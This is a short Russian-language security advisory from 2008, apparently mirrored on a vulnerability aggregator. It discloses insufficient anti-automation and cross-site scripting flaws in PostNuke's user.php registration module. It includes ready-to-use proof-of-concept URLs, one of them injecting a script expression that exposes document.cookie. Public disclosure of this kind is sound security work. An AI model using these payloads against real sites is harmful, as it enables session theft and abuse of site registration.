Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20195
HistoryJul 22, 2008 - 12:00 a.m.

Vulnerabilities in PostNuke

2008-07-2200:00:00
vulners.com
22

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною Insufficient Anti-automation и Cross-Site Scripting
уязвимостях в PostNuke.

Insufficient Anti-automation:

Уязвимость в user.php (в модуле NS-NewUser).

http://site/user.php?uname=test&[email protected]&[email protected]&agreetoterms=1&module=NS-NewUser&op=finishnewuser

XSS:

Уязвимости в user.php (в модуле NS-NewUser) в параметрах uname и email.

http://site/user.php?uname=%22%20style=%22xss:expression(alert(document.cookie))&module=NS-NewUser&op=confirmnewuser

http://site/user.php?email=%3Cxss%3E&vemail=&module=NS-NewUser&op=confirmnewuser

Уязвима версия PostNuke 0.7.1 и предыдущие версии (и потенциально следующие версии).

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/2277/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua